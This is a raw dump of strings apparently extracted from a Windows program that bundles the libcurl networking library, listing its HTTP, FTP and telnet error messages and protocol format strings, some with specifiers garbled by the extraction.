Problem with the SSL CA cert (path? access rights?)

Error in the SSH layer

Issuer check against peer certificate failed

FTP: The server did not accept the PRET command.

Unable to parse FTP file list

0123456789

%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s

Curl_ipv4_resolve_r failed for %s

%sAuthorization: Basic %s

HTTP/

Avoided giant realloc for header (max is %d)!

The requested URL returned error: %d

%s auth using %s with user '%s'

%s, d %s M d:d:d GMT

If-Modified-Since: %s

If-Unmodified-Since: %s

Last-Modified: %s

Referer: %s

Accept-Encoding: %s

Host: %s%s%s

Host: %s%s%s:%hu

ftp://

Range: bytes=%s

Content-Range: bytes %s%I64d/%I64d

Content-Range: bytes %s/%I64d

ftp://%s:%s@%s

%s HTTP/%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s=%s

Internal HTTP POST error!

Content-Type: application/x-www-form-urlencoded

Failed sending HTTP POST request

Failed sending HTTP request

Chunky upload is not supported by HTTP 1.0

HTTP error before end of send, stop sending

HTTP/%d.%d =

HTTP =

RTSP/%d.%d =

The requested URL returned error: %s

HTTP 1.0, assume close after body

HTTP/1.0 proxy connection set to keep alive!

HTTP/1.1 proxy connection set close!

HTTP/1.0 connection set to keep alive!

USER %s

PBSZ %d

Failure sending QUIT command: %s

ftp server doesn't support SIZE

RETR %s

Connect data stream passively

APPE %s

STOR %s

SIZE %s

getsockname() failed: %s

failed to resolve the address provided to PORT: %s

bind(port=%hu) on non-local address failed: %s

bind(port=%hu) failed: %s

bind() failed, we ran out of ports!

socket failure: %s

%s |%d|%s|%hu|

Failure sending EPRT command: %s

,%d,%d

%s %s

Failure sending PORT command: %s

Uploading to a URL without a file name!

FTPS not supported!

PASS %s

ACCT %s

Access denied: d

%c%c%c%u%c

Illegal port number in EPSV reply

%d,%d,%d,%d,%d,%d

Skips %d.%d.%d.%d for data connection, uses %s instead

Bad PASV/EPSV response: d

Can't resolve proxy host %s:%hu

Can't resolve new host %s:%hu

Connecting to %s (%s) port %d

TYPE %c

MDTM %s

CWD %s

PRET %s

PRET STOR %s

PRET RETR %s

REST %d

FTP response timeout

FTP response aborted due to select/poll error: %d

Preparing for accepting server on data port

Got a d ftp-server response when 220 was expected

unsupported parameter to CURLOPT_FTPSSLAUTH: %d

AUTH %s

ACCT rejected by server: d

PROT %c

Entry path is '%s'

QUOT command failed with d

MKD %s

Failed to MKD dir: d

dddddd

ddd d:d:d GMT

Last-Modified: %s, d %s M d:d:d GMT

unsupported MDTM reply format

Got a d response code instead of the assumed 200

PRET command not accepted: d

Failed to do PORT

RETR response: d

Failed FTP upload: 

Wildcard - START of "%s"

Wildcard - "%s" skipped by user

ftp_perform ends with SECONDARY: %d

Remembering we are in dir "%s"

Failure sending ABOR command: %s

server did not report OK, got %d

QUOT string not accepted: %s

PORT

%s IAC %s

%s IAC %d

%s %s %s

%s %s %d

%s %d %d

Sending data failed (%d)

%s IAC SB

%s (unsupported)

%d (unknown)

%c%c%c%c%s%c%c

%c%c%c%c

7[^,],7s

%c%s%c%s

USER,%s

7[^= ]%*[ =]%5s

Syntax error in telnet option: %s

Unknown telnet option %s

WSAStartup failed (%d)

insufficient winsock version to support telnet

failed to load WS2_32.DLL (%d)

failed to find WSACreateEvent function (%d)

failed to find WSACloseEvent function (%d)

failed to find WSAEventSelect function (%d)